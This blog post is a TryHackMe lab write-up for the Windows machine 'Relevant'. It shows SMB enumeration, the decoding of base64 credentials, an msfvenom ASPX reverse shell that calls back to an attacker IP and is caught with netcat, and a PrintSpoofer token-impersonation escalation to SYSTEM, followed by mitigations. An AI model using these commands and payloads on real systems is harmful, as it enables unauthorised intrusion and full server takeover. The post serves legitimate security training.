Post

Relevant

Exploit SMB misconfigurations to access sensitive files, upload a web shell, and escalate privileges using token impersonation on Windows Server 2016.

Posted Updated
Preview Image
By Mustafa Eltayeb
3 min read
Relevant

Relevant - TryHackMe Writeup

Relevant is a Windows-based machine focused on SMB enumeration, web shell deployment, and Windows token impersonation privilege escalation.

Difficulty: Medium ⭐⭐
Operating System: Windows Server 2016
Themes: SMB Enumeration, Web Shell Deployment, Windows Token Impersonation

Objectives

  1. Enumerate SMB shares for sensitive information
  2. Gain initial access via web shell upload
  3. Exploit token impersonation for privilege escalation
  4. Capture user and root flags

Reconnaissance

Nmap Scan

Performed comprehensive port scanning:

1

nmap -p1-65535 --min-rate 1000 10.10.134.54

Results:

1
2
3
4
5
6
7
8
9

PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3389/tcp  open  ms-wbt-server
49663/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown

Service Version Detection

1

nmap -sCV -p 80,135,445,3389,49663,49666,49667 10.10.134.54

Key Findings:

  • Port 80/49663: Microsoft IIS httpd 10.0
  • Port 445: Windows Server 2016 Standard Evaluation 14393
  • Port 3389: RDP service available
  • Ports 135,49666,49667: Microsoft Windows RPC services

SMB Share Enumeration

1

smbclient -L \\\\10.10.134.54

Discovered Shares:

1
2
3
4
5
6

Sharename       Type      Comment
---------       ----      -------
ADMIN$          Disk      Remote Admin
C$              Disk      Default share
IPC$            IPC       Remote IPC
nt4wrksv        Disk      # Interesting - accessible share

Initial Access

Accessing Sensitive Files

Connected to the accessible SMB share:

1

smbclient //10.10.134.54/nt4wrksv

Files Found:

1

passwords.txt - 98 bytes

Credential Extraction

File Content:

1
2
3

[User Passwords - Encoded]
Qm9iIC0gIVBAJCRXMHJEITEyMw==
QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk

Decoded Credentials:

1
2
3
4
5

echo "Qm9iIC0gIVBAJCRXMHJEITEyMw==" | base64 -d
# Result: Bob - !P@$$W0rD!123

echo "QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk" | base64 -d
# Result: Bill - Juw4nnaM4n420696969!$$$

Valid Credentials:

  • Username: Bob
  • Password: !P@$$W0rD!123

Web Shell Deployment

  1. Generate ASPX Reverse Shell:
    1

    msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.14.109.66 LPORT=4444 -f aspx -o rev.aspx
  2. Upload via SMB:
    1
2

    smbclient //10.10.134.54/nt4wrksv
smb: \> put rev.aspx
  3. Access Web Shell:
    1

    http://10.10.134.54:49663/nt4wrksv/rev.aspx
  4. Receive Reverse Shell:
    1

    nc -nlvp 4444

Initial Shell Access

1
2

c:\windows\system32\inetsrv>whoami
iis apppool\defaultapppool

Lateral Movement

User Flag Capture

1
2

c:\Users\Bob\Desktop>type user.txt
THM{fdk4ka34vk346ksxfr21tg789ktf45}

Privilege Enumeration

1

whoami /priv

Key Privileges:

1
2

SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled

Critical Finding: SeImpersonatePrivilege is enabled - perfect for token impersonation attacks.

Privilege Escalation

PrintSpoofer Exploitation

  1. Download PrintSpoofer:
  2. Transfer to Target:
    1
2
3

    # Via SMB upload
smbclient //10.10.134.54/nt4wrksv
smb: \> put PrintSpoofer.exe
  3. Execute Exploit:
    1

    .\PrintSpoofer.exe -i -c cmd

Successful Exploitation:

1
2
3
4
5
6
7
8

[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

Root Flag Capture

1
2

C:\Users\Administrator\Desktop>type root.txt
THM{1fk5kf469devly1gl320zafgl345pv}

Key Takeaways

Attack Path Summary:

1
2
3

Port Scanning → SMB Enumeration → Credential Discovery → 
Web Shell Upload → Initial Access → Privilege Enumeration → 
Token Impersonation → SYSTEM Access

Vulnerabilities Exploited:

  1. SMB Misconfiguration - World-readable SMB share
  2. Weak Credential Storage - Base64-encoded passwords in accessible file
  3. IIS Misconfiguration - Web-accessible SMB share directory
  4. Windows Token Privilege - Enabled SeImpersonatePrivilege

Mitigation Strategies:

  1. For SMB Security:
    • Restrict anonymous access to SMB shares
    • Implement proper share permissions
    • Regularly audit SMB configurations
    • Disable unnecessary SMB protocols
  2. For Credential Security:
    • Avoid storing credentials in plain text or weak encoding
    • Implement proper credential management systems
    • Regular password rotation policies
    • Multi-factor authentication
  3. For Windows Security:
    • Principle of least privilege for service accounts
    • Regular review of user privileges
    • Disable dangerous privileges when not required
    • Implement AppLocker or similar restrictions
  4. For Web Server Security:
    • Restrict web server directory traversal
    • Regular web application security testing
    • Input validation and sanitization
    • Web shell detection mechanisms

Tools Used:

  • Nmap - Network reconnaissance
  • smbclient - SMB enumeration and file transfer
  • msfvenom - Payload generation
  • PrintSpoofer - Windows token impersonation exploit
  • Netcat - Reverse shell handling
  • Base64 - Credential decoding

Alternative Attack Vectors:

  1. RDP Access: Could use discovered credentials for direct RDP access
  2. SMB Relay: Potential for SMB relay attacks if NTLM authentication is enabled
  3. Windows Kernel Exploits: Could attempt kernel exploits based on Windows version

Find me online:
• TryHackMe: t4t4r1s
• LinkedIn: Mustafa Altayeb
• X: @mustafa_altayeb

tryhackme
TryHackMe SMB Windows Privilege Escalation PrintSpoofer Token Impersonation IIS Windows Server 2016
This post is licensed under CC BY 4.0 by the author.